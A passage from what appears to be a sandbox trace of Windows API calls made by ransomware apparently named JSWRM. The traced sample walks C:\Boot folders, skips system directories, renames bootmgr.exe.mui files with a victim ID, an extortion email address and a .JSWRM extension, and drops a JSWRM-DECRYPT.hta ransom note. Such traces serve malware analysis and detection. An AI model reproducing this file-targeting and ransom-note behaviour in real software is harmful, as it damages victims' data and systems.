FindFirstFileW (in: lpFileName="C:\\Boot\\hr-HR\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cc753ad, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0063.953] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.953] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cc753ad, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.953] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.953] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.953] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.953] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.953] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.953] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.953] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.954] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.954] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.954] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.954] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.954] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.954] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.954] CreateFileW (lpFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.954] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234336960) returned 0 [0063.954] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.955] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.955] CloseHandle (hObject=0xffffffff) returned 1 [0063.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0063.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0063.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0063.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225f30 [0063.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0063.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0063.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225f30 | out: hHeap=0x1e0000) returned 1 [0063.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.956] MoveFileW (lpExistingFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0063.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.956] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cc753ad, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cc753ad, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cc753ad, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.956] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.956] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.956] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.956] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.956] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.956] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.956] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.956] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.956] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.956] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.957] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cc753ad, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cc753ad, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cc753ad, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0063.957] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0063.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0063.957] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0063.957] lstrcmpiW (lpString1="hu-HU", lpString2=".") returned 1 [0063.957] lstrcmpiW (lpString1="hu-HU", lpString2="..") returned 1 [0063.957] lstrcmpiW (lpString1="hu-HU", lpString2="...") returned 1 [0063.957] lstrcmpiW (lpString1="hu-HU", lpString2="windows") returned -1 [0063.957] lstrcmpiW (lpString1="hu-HU", lpString2="recovery") returned -1 [0063.957] lstrcmpiW (lpString1="hu-HU", lpString2="perflogs") returned -1 [0063.957] lstrcmpiW (lpString1="hu-HU", lpString2="documents and settings") returned 1 [0063.957] lstrcmpiW (lpString1="hu-HU", lpString2="$RECYCLE.BIN") returned 1 [0063.957] lstrcmpiW (lpString1="hu-HU", lpString2="system volume information") returned -1 [0063.957] lstrcmpiW (lpString1="hu-HU", lpString2="msocache") returned -1 [0063.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0063.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0063.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237268 [0063.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.957] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\hu-hu\\jswrm-decrypt.hta")) returned 0xffffffff [0063.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237268 | out: hHeap=0x1e0000) returned 1 [0063.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0063.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.958] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\hu-hu\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.958] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.958] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.961] CloseHandle (hObject=0x450) returned 1 [0063.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0063.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0063.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0063.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0063.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0063.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.962] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\hu-hu\\jswrm-decrypt.hta")) returned 0x20 [0063.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0063.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0063.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.962] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cc753ad, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x2321c0 [0063.962] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.962] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cc753ad, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.963] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.963] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.963] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13360, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.963] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.963] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.963] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.963] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.963] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.963] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.963] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.963] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.963] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.963] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.963] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.964] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561371256) returned 0 [0063.964] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.965] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.965] CloseHandle (hObject=0xffffffff) returned 1 [0063.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 